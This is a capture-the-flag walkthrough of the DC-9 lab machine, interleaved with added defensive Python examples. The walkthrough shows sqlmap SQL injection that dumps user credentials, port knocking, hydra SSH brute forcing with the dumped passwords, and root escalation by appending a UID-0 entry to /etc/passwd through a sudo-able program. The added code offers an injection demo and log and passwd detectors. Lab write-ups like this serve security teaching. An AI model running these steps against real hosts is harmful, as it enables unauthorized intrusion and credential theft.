Penetration testing: DC-9 target practice log (DC-9 walkthrough notes)
1. Information gathering
# arp-scan -l
# nmap -A -p- 10.0.0.28
# Nothing interesting in the results, so they are not copied here.
2. A BurpSuite scan finds a SQL injection vulnerability
3. Next, sqlmap
In BurpSuite, find the results.php page, then in the Request panel right-click -> Copy to file and save it as a txt file (). That request file is what sqlmap is fed.
┌──(root kali)-[~/game/dc-9]
└─# sqlmap - --dbs
# Lots of output; these are the useful lines
available databases [3]:
[*] information_schema
[*] Staff
[*] users
# Start with Staff
┌──(root kali)-[~/game/dc-9]
└─# sqlmap - -D Staff --tables
[03:15:06] [INFO] fetching tables for database: 'Staff'
Database: Staff
[2 tables]
+--------------+
| StaffDetails |
| Users |
+--------------+
┌──(root kali)-[~/game/dc-9]
└─# sqlmap - -D Staff -T Users --columns
[03:17:01] [INFO] fetching columns for table 'Users' in database 'Staff'
Database: Staff
Table: Users
[3 columns]
+----------+-----------------+
| Column | Type |
+----------+-----------------+
| Password | varchar(255) |
| UserID | int(6) unsigned |
| Username | varchar(255) |
+----------+-----------------+
┌──(root kali)-[~/game/dc-9]
└─# sqlmap - -D Staff -T Users -C Username,Password --dump
# Note: there must be no space between Username and Password
Database: Staff
Table: Users
[1 entry]
+----------+----------------------------------+
| Username | Password |
+----------+----------------------------------+
| admin | 856f5de590ef37314e7c3bdf6f8a66dc |
+----------+----------------------------------+
# Online MD5 lookup gives: transorbital1
# There are many such sites: /
# Tested: this logs into the site's admin backend, but nothing useful turned up there. So, next, the users database.
┌──(root kali)-[~/game/dc-9]
└─# sqlmap - -D users --tables
[03:29:21] [INFO] fetching tables for database: 'users'
Database: users
[1 table]
+-------------+
| UserDetails |
+-------------+
┌──(root kali)-[~/game/dc-9]
└─# sqlmap - -D users -T UserDetails --columns
[04:08:41] [INFO] fetching columns for table 'UserDetails' in database 'users'
Database: users
Table: UserDetails
[6 columns]
+-----------+-----------------+
| Column | Type |
+-----------+-----------------+
| firstname | varchar(30) |
| id | int(6) unsigned |
| lastname | varchar(30) |
| password | varchar(20) |
| reg_date | timestamp |
| username | varchar(30) |
+-----------+-----------------+
┌──(root kali)-[~/game/dc-9]
└─# sqlmap - -D users -T UserDetails -C username,password --dump
+-----------+---------------+
| username | password |
+-----------+---------------+
| marym | 3kfs86sfd |
| julied | 468sfdfsd2 |
| fredf | 4sfd87sfd1 |
| barneyr | RocksOff |
| tomc | TC&TheBoyz |
| jerrym | B8m#48sd |
| wilmaf | Pebbles |
| bettyr | BamBam01 |
| chandlerb | UrAG0D! |
| joeyt | Passw0rd |
| rachelg | yN72#dsd |
| rossg | ILoveRachel |
| monicag | 3248dsds7s |
| phoebeb | smellycats |
| scoots | YR3BVxxxw87 |
| janitor | Ilovepeepee |
| janitor2 | Hawaii-Five-0 |
+-----------+---------------+
# Quite a lot came out, but it is not yet clear how to use it. SSH also seems to be filtered.
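As an added illustration of why sqlmap could pull the whole database out of results.php (this is example code written for these notes, not code from the writeup or from the DC-9 machine): the same search is built two ways over a small constructed SQLite table modelled on the UserDetails columns above. The vulnerable version pastes the search term into the SQL string, so a single quote in the input ends the string literal and the rest of the input is parsed as SQL; the safe version binds the term as a parameter. The table rows, the query shape and the function names are assumptions.

```python
import sqlite3

# Constructed sample rows (hypothetical; only the column names follow the dump above).
SAMPLE_ROWS = [
    ("Mary", "Moe", "marym"),
    ("Julie", "Dooley", "julied"),
    ("Fred", "Flintstone", "fredf"),
]


def make_db():
    """Build an in-memory SQLite database with a UserDetails-like table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE UserDetails (id INTEGER PRIMARY KEY, firstname TEXT, "
        "lastname TEXT, username TEXT)"
    )
    conn.executemany(
        "INSERT INTO UserDetails (firstname, lastname, username) VALUES (?, ?, ?)",
        SAMPLE_ROWS,
    )
    return conn


def search_vulnerable(conn, term):
    """Search by concatenating the user-supplied term into the SQL text.

    This is the pattern sqlmap exploits: a quote in the input closes the string
    literal and whatever follows is executed as SQL.
    """
    sql = "SELECT firstname, lastname, username FROM UserDetails WHERE firstname = '%s'" % term
    return conn.execute(sql).fetchall()


def search_safe(conn, term):
    """Same search with a bound parameter: the term is data and is never parsed as SQL."""
    sql = "SELECT firstname, lastname, username FROM UserDetails WHERE firstname = ?"
    return conn.execute(sql, (term,)).fetchall()


def demo():
    """Run both searches with a normal term and with a tautology payload."""
    conn = make_db()
    injected = "' OR '1'='1"   # becomes: WHERE firstname = '' OR '1'='1'
    return {
        "normal_vulnerable": len(search_vulnerable(conn, "Mary")),
        "normal_safe": len(search_safe(conn, "Mary")),
        "injected_vulnerable": len(search_vulnerable(conn, injected)),
        "injected_safe": len(search_safe(conn, injected)),
    }


if __name__ == "__main__":
    print(demo())
```

With the tautology input the concatenated query returns every row of the table (3 here), which is exactly the leverage sqlmap builds on to enumerate databases, tables and columns; the parameterised query returns nothing because no first name literally equals the payload string.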
4. Back to the website, looking more carefully
From the message "File does not exist" at the bottom of the page, one can infer that there may be a file inclusion vulnerability. A Baidu search turned up the idea of port knocking to open the SSH port (another new thing for me).
By viewing the ../../../../f file through that inclusion, and combining it with what the search turned up, it became clear that hitting these three ports in turn with nc would open the SSH port.
┌──(root kali)-[~/game/dc-9]
└─# nc 10.0.0.28 7469
(UNKNOWN) [10.0.0.28] 7469 (?) : Connection refused
┌──(root kali)-[~/game/dc-9]
└─# nc 10.0.0.28 8475
(UNKNOWN) [10.0.0.28] 8475 (?) : Connection refused
┌──(root kali)-[~/game/dc-9]
└─# nc 10.0.0.28 9842
(UNKNOWN) [10.0.0.28] 9842 (?) : Connection refused
┌──(root kali)-[~/game/dc-9]
└─# nmap -A -p- 10.0.0.28
Starting Nmap 7.91 ( nmap ) at 2021-08-31 04:04 EDT
Nmap scan report for 10.0.0.28
Host is up (0.00026s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 a2:b3:38:74:32:74:0b:c5:16:dc:13:de:cb:9b:8a:c3 (RSA)
| 256 06:5c:93:87:15:54:68:6b:88:91:55:cf:f8:9a:ce:40 (ECDSA)
|_ 256 e4:2c:88:da:88:63:26:8c:93:d5:f7:63:2b:a3:eb:ab (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
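The knock sequence above (7469, 8475, 9842, each refused, then port 22 appears in the next scan) is the classic knockd pattern. From the defender's side the useful question is how visible such a sequence is in firewall logs. The script below is an added example written for these notes, not code from the writeup or from the DC-9 machine: it reads constructed netfilter-style LOG lines and reports every source that completed the sequence, in order, within a short window. The reset rules (a wrong port or an expired window restarts the sequence) are my reading of how knockd behaves, so treat them as an assumption; the log format and all addresses are constructed.

```python
import re
from datetime import datetime

# Knock sequence taken from the writeup: the three ports tried with nc, in order.
KNOCK_SEQUENCE = (7469, 8475, 9842)

# Matches an iptables LOG line; only the timestamp, source and destination port are captured.
LOG_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) .*SRC=(?P<src>[\d.]+) .*DPT=(?P<dpt>\d+)"
)

# Constructed log lines (hypothetical, modelled on iptables LOG output).
# 10.0.0.20 knocks correctly; 10.0.0.99 knocks in the wrong order;
# 10.0.0.77 knocks in order but the last knock arrives far too late.
SAMPLE_LOG = """\
Aug 31 04:02:10 dc-9 kernel: IN=eth0 SRC=10.0.0.20 DST=10.0.0.28 PROTO=TCP SPT=51000 DPT=7469 SYN
Aug 31 04:02:11 dc-9 kernel: IN=eth0 SRC=10.0.0.20 DST=10.0.0.28 PROTO=TCP SPT=51001 DPT=8475 SYN
Aug 31 04:02:12 dc-9 kernel: IN=eth0 SRC=10.0.0.20 DST=10.0.0.28 PROTO=TCP SPT=51002 DPT=9842 SYN
Aug 31 04:03:00 dc-9 kernel: IN=eth0 SRC=10.0.0.99 DST=10.0.0.28 PROTO=TCP SPT=40000 DPT=7469 SYN
Aug 31 04:03:01 dc-9 kernel: IN=eth0 SRC=10.0.0.99 DST=10.0.0.28 PROTO=TCP SPT=40001 DPT=9842 SYN
Aug 31 04:03:02 dc-9 kernel: IN=eth0 SRC=10.0.0.99 DST=10.0.0.28 PROTO=TCP SPT=40002 DPT=8475 SYN
Aug 31 04:10:00 dc-9 kernel: IN=eth0 SRC=10.0.0.77 DST=10.0.0.28 PROTO=TCP SPT=30000 DPT=7469 SYN
Aug 31 04:10:01 dc-9 kernel: IN=eth0 SRC=10.0.0.77 DST=10.0.0.28 PROTO=TCP SPT=30001 DPT=8475 SYN
Aug 31 04:11:30 dc-9 kernel: IN=eth0 SRC=10.0.0.77 DST=10.0.0.28 PROTO=TCP SPT=30002 DPT=9842 SYN
"""


def parse(line):
    """Return (timestamp, source ip, destination port) or None for non-matching lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")
    return ts, m.group("src"), int(m.group("dpt"))


def find_completed_knocks(lines, sequence=KNOCK_SEQUENCE, timeout=10):
    """Return (source, time) for every source that sent the full sequence in order,
    with all knocks within `timeout` seconds of the first one.

    Assumed reset rules: a wrong port or an expired window discards progress, and the
    offending packet is then re-evaluated as a possible first knock.
    """
    state = {}   # src -> (index of the next expected port, time of the first knock)
    hits = []
    for line in lines:
        parsed = parse(line)
        if parsed is None:
            continue
        ts, src, dpt = parsed
        idx, started = state.get(src, (0, None))
        if started is not None and (ts - started).total_seconds() > timeout:
            idx, started = 0, None          # window expired: start over
        if dpt == sequence[idx]:
            if idx == 0:
                started = ts
            idx += 1
        elif dpt == sequence[0]:
            idx, started = 1, ts            # wrong port, but it restarts a sequence
        else:
            idx, started = 0, None
        if idx == len(sequence):
            hits.append((src, ts.strftime("%H:%M:%S")))
            idx, started = 0, None
        state[src] = (idx, started)
    return hits


if __name__ == "__main__":
    print(find_completed_knocks(SAMPLE_LOG.splitlines()))
```

Only 10.0.0.20 is reported: three SYNs to closed ports in a fixed order within seconds is a distinctive signature, which is why logging dropped packets (rather than silently dropping them) matters on a host that relies on knocking, and why knocking alone is obscurity, not authentication.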
Now the pile of usernames and passwords that were found can be put to use. Save them into two files: user.txt and a second file for the passwords. Vim's visual-block operations save a lot of time here; one could even consider the three Linux power tools sed, grep and gawk, though I haven't learned them yet. Once the files are saved, bring out hydra. Note: one username per line, one password per line, with usernames and passwords in two separate files.
┌──(root kali)-[~/game/dc-9]
└─# hydra - - 10.0.0.28 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (/vanhauser-thc/thc-hydra) starting at 2021-08-31 04:04:48
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 289 login tries (l:17/p:17), ~19 tries per task
[DATA] attacking ssh://10.0.0.28:22/
[22][ssh] host: 10.0.0.28 login: chandlerb password: UrAG0D!
[22][ssh] host: 10.0.0.28 login: joeyt password: Passw0rd
[22][ssh] host: 10.0.0.28 login: janitor password: Ilovepeepee
1 of 1 target successfully completed, 3 valid passwords found
# The more I play, the more impressive this gets; the conciseness and efficiency of these Linux tools are on full display here.
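The hydra run above is 289 login attempts against sshd in about a minute, which the target's auth log records one line at a time. As an added example for these notes (not code from the writeup or from DC-9), the script below summarises constructed Debian-style sshd log lines per source address and flags the pattern hydra produces with a username list: many failures spread over many distinct usernames, followed by a success. The log lines, addresses and thresholds are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed sshd lines (hypothetical, modelled on Debian /var/log/auth.log).
# 10.0.0.20 sprays six usernames and gets in as joeyt; 10.0.0.50 is a user mistyping once.
SAMPLE_AUTH_LOG = """\
Aug 31 04:04:49 dc-9 sshd[1201]: Failed password for invalid user marym from 10.0.0.20 port 51001 ssh2
Aug 31 04:04:49 dc-9 sshd[1202]: Failed password for invalid user julied from 10.0.0.20 port 51002 ssh2
Aug 31 04:04:50 dc-9 sshd[1203]: Failed password for fredf from 10.0.0.20 port 51003 ssh2
Aug 31 04:04:50 dc-9 sshd[1204]: Failed password for invalid user barneyr from 10.0.0.20 port 51004 ssh2
Aug 31 04:04:51 dc-9 sshd[1205]: Failed password for janitor from 10.0.0.20 port 51005 ssh2
Aug 31 04:04:52 dc-9 sshd[1206]: Accepted password for joeyt from 10.0.0.20 port 51006 ssh2
Aug 31 04:30:00 dc-9 sshd[1300]: Failed password for fredf from 10.0.0.50 port 42000 ssh2
Aug 31 04:30:05 dc-9 sshd[1301]: Accepted password for fredf from 10.0.0.50 port 42001 ssh2
"""

# "invalid user" appears when the username does not exist on the host.
AUTH_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>[\d.]+) port \d+"
)


def summarize_ssh_auth(lines):
    """Per source IP: failure count, distinct usernames tried, and accepted logins in order."""
    stats = defaultdict(lambda: {"failed": 0, "users": set(), "accepted": []})
    for line in lines:
        m = AUTH_RE.search(line)
        if not m:
            continue
        entry = stats[m.group("src")]
        entry["users"].add(m.group("user"))
        if m.group("result") == "Failed":
            entry["failed"] += 1
        else:
            entry["accepted"].append(m.group("user"))
    return stats


def flag_sprays(stats, min_failures=5, min_users=3):
    """Flag sources with many failures across many usernames; a success after such a
    run is the alert worth paging on, because it means a guessed password worked."""
    alerts = []
    for src, e in sorted(stats.items()):
        if e["failed"] >= min_failures and len(e["users"]) >= min_users:
            alerts.append({
                "src": src,
                "failed": e["failed"],
                "distinct_users": len(e["users"]),
                "success_after_spray": e["accepted"],
            })
    return alerts


def demo(log=SAMPLE_AUTH_LOG):
    return flag_sprays(summarize_ssh_auth(log.splitlines()))


if __name__ == "__main__":
    print(demo())
```

The single-user mistype from 10.0.0.50 stays below both thresholds; the spray from 10.0.0.20 trips them and carries the accepted login with it. Hydra's own "[WARNING] ... use -t 4" hints at the other side of this: sshd's MaxStartups and MaxAuthTries limits, and a tool such as fail2ban acting on exactly these log lines, are what make 289 guesses per minute unrealistic on a hardened host.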
5. From here one can happily SSH into the target
# It turns out I celebrated too early: the three users' home directories showed nothing with ls. Only after searching online did I realize the files were hidden dot files. I had forgotten some of the most basic things.
janitor@dc-9:~$ ls -al
total 20
drwx------ 4 janitor janitor 4096 Aug 31 18:38 .
drwxr-xr-x 19 root root 4096 Dec 29 2019 ..
lrwxrwxrwx 1 janitor janitor 9 Dec 29 2019 .bash_history -> /dev/null
drwx------ 3 janitor janitor 4096 Aug 31 18:05 .gnupg
drwx------ 2 janitor janitor 4096 Dec 29 2019 .secrets-for-putin
-rw-r--r-- 1 janitor janitor 6 Aug 31 18:
janitor@dc-9:~$ cd .secrets-for-putin/
janitor@dc-9:~/.secrets-for-putin$ ls
janitor@dc-9:~/.secrets-for-putin$
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts
# Add these passwords to the password file above and run hydra again
┌──(root kali)-[~/game/dc-9]
└─# hydra - - 10.0.0.28 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (/vanhauser-thc/thc-hydra) starting at 2021-08-31 04:50:16
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 391 login tries (l:17/p:23), ~25 tries per task
[DATA] attacking ssh://10.0.0.28:22/
[22][ssh] host: 10.0.0.28 login: fredf password: B4-Tru3-001
[22][ssh] host: 10.0.0.28 login: joeyt password: Passw0rd
[STATUS] 356.00 tries/min, 356 tries in 00:01h, 40 to do in 00:01h, 16 active
1 of 1 target successfully completed, 2 valid passwords found
Hydra (/vanhaur-thc/thc-hydra) finished at 2021-08-31 04:51:26
# Another account found: fredf
fredf@dc-9:/home/janitor/.secrets-for-putin$ cd ~
fredf@dc-9:~$ sudo -l
Matching Defaults entries for fredf on dc-9:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User fredf may run the following commands on dc-9:
(root) NOPASSWD: /opt/devstuff/dist/test/test
# Logged in as fredf, he turns out to have a special privilege: sudo lets him run a test script as root without a password.
fredf@dc-9:~$ /opt/devstuff/dist/test/test --help
Usage: python test.py read append
fredf@dc-9:~$
# What test does is append the contents of one file to another file. The first idea is to use test to write a user entry into the passwd file, but that user's password must be in encrypted (hashed) form; the entry only takes effect if it is generated as follows.
fredf@dc-9:~$ openssl passwd -1 -salt xl zylee
$1$xl$Qr4AkYPDjDkVDlixUxrcZ.
fredf@dc-9:~$ echo 'xl:$1$xl$Qr4AkYPDjDkVDlixUxrcZ.:0:0::/root:/bin/bash'>/tmp/xl
fredf@dc-9:~$ sudo /opt/devstuff/dist/test/test /tmp/xl /etc/passwd
fredf@dc-9:~$ su xl
Password:
root@dc-9:/home/fredf# cd /root
root@dc-9:~# ls
root@dc-9:~#
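From the defender's side, the lesson of this last step is that a NOPASSWD sudo rule on a program that appends one file to another is equivalent to handing out root, and that the resulting /etc/passwd entry is trivial to spot: a second UID 0 account, with a hash sitting in the password field instead of the usual "x", and a home directory of /root. The audit below is an added example written for these notes, not code from the writeup or from DC-9; the passwd excerpt is constructed (hypothetical UIDs and GECOS fields), with the last line being the entry the writeup appended.

```python
# Constructed /etc/passwd excerpt (hypothetical rows). The last line is the entry the
# writeup appended via the sudo-able 'test' program: a second UID-0 account whose
# password hash sits in /etc/passwd itself instead of /etc/shadow.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
fredf:x:1001:1001:Fred Flintstone,,,:/home/fredf:/bin/bash
janitor:x:1017:1017:,,,:/home/janitor:/bin/bash
xl:$1$xl$Qr4AkYPDjDkVDlixUxrcZ.:0:0::/root:/bin/bash
"""

# Placeholder values a shadowed Debian-style system keeps in the passwd password field.
SHADOW_PLACEHOLDERS = ("x", "*", "!")


def audit_passwd(text):
    """Return (finding, subject) pairs for entries that should never appear in a
    healthy /etc/passwd on a system that uses /etc/shadow."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(("malformed-entry", line))
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        if not uid.isdigit():
            findings.append(("non-numeric-uid", name))
            continue
        # Any UID 0 besides root is a root account under another name.
        if int(uid) == 0 and name != "root":
            findings.append(("extra-uid-0-account", name))
        # A real hash here is honoured by the login path and bypasses /etc/shadow;
        # an empty field means no password at all.
        if pw not in SHADOW_PLACEHOLDERS:
            findings.append(("hash-or-empty-password-in-passwd", name))
        if home == "/root" and name != "root":
            findings.append(("non-root-home-is-/root", name))
    return findings


if __name__ == "__main__":
    for finding, who in audit_passwd(SAMPLE_PASSWD):
        print(f"{finding}: {who}")
```

A check like this belongs in whatever already watches the host (a file-integrity tool on /etc/passwd and /etc/sudoers.d, or a periodic job), and the root cause is fixed in sudoers: a rule that lets an unprivileged user run, as root and without a password, anything that reads or writes files of its caller's choosing is a root grant, however harmless the program's name.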
███╗██╗██╗██████╗███████╗██╗██╗██████╗██████╗██╗██╗██╗██╗██╗
████╗██║██║██╔════╝██╔════╝██║██║██╔═══██╗██╔══██╗██║██╔╝██║██║██║
██╔██╗██║██║██║█████╗██║█╗██║██║██║██████╔╝█████╔╝██║██║██║
██║╚██╗██║██║██║██╔══╝██║███╗██║██║██║██╔══██╗██╔═██╗╚═╝╚═╝╚═╝
██║╚████║██║╚██████╗███████╗╚███╔███╔╝╚██████╔╝██║██║██║██╗██╗██╗██╗
╚═╝╚═══╝╚═╝╚═════╝╚══════╝╚══╝╚══╝╚═════╝╚═╝╚═╝╚═╝╚═╝╚═╝╚═╝╚═╝
Congratulations - you have done well to get to this point.
Hope you enjoyed DC-9. Just wanted to send out a big thanks to all those
who have taken the time to complete the various DC challenges.
I also want to send out a big thank you to the various members of @m0tl3ycr3w .
They are an inspirational bunch of fellows.
Sure, they might smell a bit, just kidding. :-)
Sadly, all things must come to an end, and this will be the last ever
challenge in the DC series.
So long, and thanks for all the fish.